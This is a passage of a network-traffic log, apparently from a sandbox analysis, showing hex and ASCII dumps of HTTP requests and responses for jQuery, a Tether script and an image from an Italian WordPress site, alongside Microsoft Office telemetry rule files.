                                                                                                                                          2024-11-28 10:33:11 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          107192.168.2.4498495.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:11 UTC587OUTGET /wp-content/themes/tentamus/dist/scripts/main.js?ver=2001211040 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:13 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:11 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 73242
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:11 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:13 UTC7876INData Raw: 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 74 2e 54 65 74 68 65 72 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69
                                                                                                                                          Data Ascii: if(function(t,e){"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?module.exports=e():t.Tether=e()}(this,function(){"use strict";function t(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}functi


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          108192.168.2.4498725.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:11 UTC632OUTGET /wp-content/uploads/sites/71/2018/04/0001_02.jpg HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:11 UTC281INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:11 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 29 May 2018 16:08:40 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 41754
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:11 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          2024-11-28 10:33:11 UTC7911INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 04 03 03 03 03 03 04 03 03 04 06 04 03 04 06 07 05 04 04 05 07 08 06 06 07 06 06 08 0a 08 09 09 09 09 08 0a 0a 0c 0c 0c 0c 0c 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 04 05 05 08 07 08 0f 0a 0a 0f 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 00 fa 00 fa 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 04 05 02 03 06 01 07 00 08 ff c4 00 1b 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 01 00 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f2 b0 64 0f 52
                                                                                                                                          Data Ascii: JFIFCCdR
                                                                                                                                          2024-11-28 10:33:12 UTC8000INData Raw: ad 77 df 4c 3d 54 18 d7 a9 98 40 4e 8a f0 6b 43 b8 1d 9b 7e aa f4 8d f0 65 4a 8f a6 cd 89 91 5a ec 30 38 8c b8 8d be 21 0b ac a5 41 f1 23 ff 00 d3 7c d4 36 96 60 78 e2 3e c9 d7 cb ef 1e e8 cc 8a 83 24 d3 7b dd 02 7f 9b 34 db e2 77 c6 18 67 79 19 b9 9e ed d1 b3 25 da 31 b2 7b b8 13 f2 0b b7 00 cd ad fd c7 ee 8b 1a 7b ee 38 e5 94 f6 eb 2f e1 34 76 40 92 67 3c 85 27 bb 7a 91 3d e6 e2 28 d6 e5 0e 79 ed 39 0d 31 29 b2 ba 5a 6a 35 cd ce c5 c7 fc 46 09 f1 2f 3b 76 1a 0d ca 04 45 0e 24 93 22 a7 d8 a1 44 50 ac f7 04 95 bd a0 59 dc e3 95 46 f0 41 f9 2e d2 0f e5 ff 00 e4 fd df 44 0b 9b 50 55 aa d5 11 d0 e4 0d d3 eb b3 72 89 78 9e f2 83 19 cc f7 49 1b a8 ba 2f a4 22 c4 88 59 12 b4 98 3a 11 8f 8f c9 5b 2d 23 01 cf dd 47 84 0c cb 54 38 9d e1 3f a1 d8 a7 34 d8 81 a6 62
                                                                                                                                          Data Ascii: wL=T@NkC~eJZ08!A#|6`x>${4wgy%1{{8/4v@g<'z=(y91)Zj5F/;vE$"DPYFA.DPUrxI/"Y:[-#GT8?4b
                                                                                                                                          2024-11-28 10:33:12 UTC8000INData Raw: 82 ad 9b 8c 0e ed b3 63 c4 5e 2a 6e 4e a0 76 9b 33 97 86 70 87 71 63 d3 26 c3 db a7 4a bf 53 87 1e 95 7e 8e 4b 1a ee eb fa e5 12 55 d6 33 fc 49 e7 14 d4 a5 34 77 90 a1 a8 fe d1 37 10 43 9a e2 00 95 52 ec ab af 23 98 30 fc 9a 2a 75 40 a5 48 50 a9 4a a6 c0 c8 6b cc 8d 63 0f 52 64 e1 61 bb 4a 46 66 02 a9 0b c5 1e 23 f4 8f 59 b3 40 d1 36 85 23 14 da 71 0c ae ca ac 6b ce 70 ce c4 52 e1 5d 20 e8 52 ad 21 a7 36 5e 8d e3 c4 74 29 13 33 10 e3 6c d2 87 96 1b 3b 33 63 75 08 4a 12 92 69 12 b7 eb c6 36 cf b9 5a d1 d8 16 1e e8 69 d6 ca 5b 77 23 56 52 4d f4 e5 00 93 12 44 93 e7 2d 80 a1 ce e6 47 be 79 42 f0 cc a5 23 18 d9 92 93 6a 15 2d e4 da d6 39 5b 59 42 4e 29 bd 9e dd 2a 77 94 d4 a2 4f c6 2a 70 ca 79 9e 42 01 40 da b4 ae 17 1b 13 f7 8d 22 84 a1 45 5c a4 67 15 2b 0c
                                                                                                                                          Data Ascii: c^*nNv3pqc&JS~KU3I4w7CR#0*u@HPJkcRdaJFf#Y@6#qkpR] R!6^t)3l;3cuJi6Zi[w#VRMD-GyB#j-9[YBN)*wO*pyB@"E\g+
                                                                                                                                          2024-11-28 10:33:12 UTC8000INData Raw: 89 74 02 59 2b 01 9e 65 9d 39 7c 31 b4 95 37 79 e4 db 5f 5a 9e 5f f0 fd 7f d5 0a 95 9e fa 5e 7e 78 fb 95 77 3b 66 2c 06 a8 9c b8 ce 23 03 01 cc f3 21 6f 27 93 b7 e5 9d 5c 67 51 df 6b 41 f8 18 2e ac ed f4 7a 3c 55 57 b8 c0 ef 4d 7c 70 39 b4 5d 2b 0c 1b 9b e6 e6 04 c9 5c 97 94 b6 ed 30 d6 e5 f3 46 91 79 87 07 9f ba 8b 1a bd f2 72 b5 09 a7 25 98 65 db a5 30 dc 6d 65 5d d6 ea fa 97 68 8e 72 ce a1 70 61 e4 26 79 8d 4b 82 f2 0f 1b db 14 9b 08 ce e9 9f d0 32 78 5b 97 0f 92 ba fc 10 d7 50 70 5f 00 72 5e de 5e d0 6b ee 60 ab e2 1a a6 f9 c5 40 18 22 ef 24 d5 f8 b5 99 8f 6f 65 65 2e d0 e5 e5 10 20 8e 00 b8 d5 36 56 33 cc 0c 00 db 90 96 18 c0 ba 71 32 b1 14 19 b3 e3 46 0b b8 3d 69 3c 5b b7 49 4f f1 e7 f5 c7 ad 5c e1 43 b6 00 53 5c af bf ee 62 9d e4 e0 5c 8e 5f da 0b
                                                                                                                                          Data Ascii: tY+e9|17y_Z_^~xw;f,#!o'\gQkA.z<UWM|p9]+\0Fyr%e0me]hrpa&yK2x[Pp_r^^k`@"$oee. 6V3q2F=i<[IO\CS\b\_
                                                                                                                                          2024-11-28 10:33:12 UTC8000INData Raw: e2 c5 08 b7 4e c7 33 59 61 a1 73 99 f1 42 b6 34 e9 de be b3 05 38 57 24 35 81 80 fb 1b ec 96 8b ae 4c 22 cd e6 7c 6b 01 96 87 30 7d 4c cb 3a 87 c2 04 a9 71 8b 47 bb 28 5d 1b 0e 9c 57 df 9a 21 81 29 7c ef 71 00 0c c7 65 b3 bd 94 43 5d b1 bb 3e 88 68 a3 c6 a3 fc 6e dc a2 d9 0c 74 40 e6 b7 14 0f 00 9e fc f5 7d 8d ea 64 02 86 bb 10 28 4b 09 7c 43 9a 70 a6 1e 87 f4 86 29 82 0e b3 09 b1 02 c7 81 a7 4a e9 33 2d dd 7d 2e 26 d1 a5 94 d4 14 b2 86 c1 f2 5a 26 b0 71 cf 61 03 cd bd 40 ef dd 06 81 a9 74 06 cd df 3e f5 82 ae 0b d3 e4 3c ea a3 00 e7 89 30 62 90 d3 2e ad b5 75 4e 99 98 f6 fd 58 9f 22 7d 28 60 30 93 40 35 af 40 e3 e5 bc 7d 70 a3 c8 17 af 9e d8 85 ad 22 1e ec 3d e0 14 bb 1d a7 30 7a 19 fc 9d d8 e3 2b 45 86 30 e6 73 87 c2 a5 31 f8 fd cb e2 67 4f f6 10 d8 cc
                                                                                                                                          Data Ascii: N3YasB48W$5L"|k0}L:qG(]W!)|qeC]>hnt@}d(K|Cp)J3-}.&Z&qa@t><0b.uNX"}(`0@5@}p"=0z+E0s1gO
                                                                                                                                          2024-11-28 10:33:12 UTC1843INData Raw: 5c 89 ce 6d 3b fc e0 6a 40 1a 1a 00 a2 25 36 5c 21 10 52 02 e1 25 23 2b c3 95 3c 0d 46 e6 4a 39 31 2b 01 52 1c 66 ba ae fb e8 cb 46 8d d2 b9 7e f0 30 12 02 a4 92 46 46 85 3d 0b 88 94 00 1d e5 4a a8 55 2b 6e f1 3b 18 72 b4 5d f2 c3 a3 bc 1f 9e 53 f3 b8 43 e4 61 72 ee 5e 79 d2 73 43 7a a9 eb 00 21 38 df 81 de ca 69 5b 7a 96 1c b4 0b 44 69 83 57 d9 9f ed 6c 11 b8 b3 76 df 81 a7 d1 80 4d fa 36 78 4f 78 f5 b1 1a 7c c3 e5 c2 c7 df 88 ef 58 c7 68 38 33 14 c8 85 e4 1d 8c c8 b3 6b 35 13 76 d0 e3 0b bc 21 82 eb 14 bb ef fc 61 ff 00 c4 c2 c2 16 14 17 cf 0c 05 94 a7 b4 bc e6 99 95 53 36 45 f9 8c a4 8c 74 04 18 46 a4 59 88 6f 91 94 83 c4 eb 0c 6c 4d d0 6b a3 2e 56 ad 56 c4 f2 61 39 49 d3 a6 d7 54 4e 9d 65 04 3d f6 2f 6b cd ca 24 90 d3 cf ae 2f ab 85 2f 6d a2 83 64 1e
                                                                                                                                          Data Ascii: \m;j@%6\!R%#+<FJ91+RfF~0FF=JU+n;r]SCar^ysCz!8i[zDiWlvM6xOx|Xh83k5v!aS6EtFYolMk.VVa9ITNe=/k$//md


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          109192.168.2.44987113.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:11 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:11 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 499
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                          ETag: "0x8DC582B98CEC9F6"
                                                                                                                                          x-ms-request-id: faa09a65-901e-00ac-8010-41b69e000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103311Z-174f7845968cdxdrhC1EWRg0en0000000y50000000009uw5
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:11 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          110192.168.2.44987313.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:12 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:12 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 415
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                          ETag: "0x8DC582B988EBD12"
                                                                                                                                          x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103312Z-174f7845968px8v7hC1EWR08ng0000000ygg000000006zg1
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:12 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          111192.168.2.44987413.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:12 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:12 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 471
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                          ETag: "0x8DC582BB5815C4C"
                                                                                                                                          x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103312Z-174f7845968j6t2phC1EWRcfe80000000yeg0000000056gd
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:12 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          112192.168.2.4498765.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:12 UTC389OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:13 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:12 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 28 Mar 2023 12:34:43 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 89684
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:12 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:13 UTC7876INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                          Data Ascii: /*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 74 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 74 29 26 26 65 2e 74 79 70 65 3d 3d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 69 73 44 69 73 61 62 6c 65
                                                                                                                                          Data Ascii: ction(e){var t=e.nodeName.toLowerCase();return("input"===t||"button"===t)&&e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisable
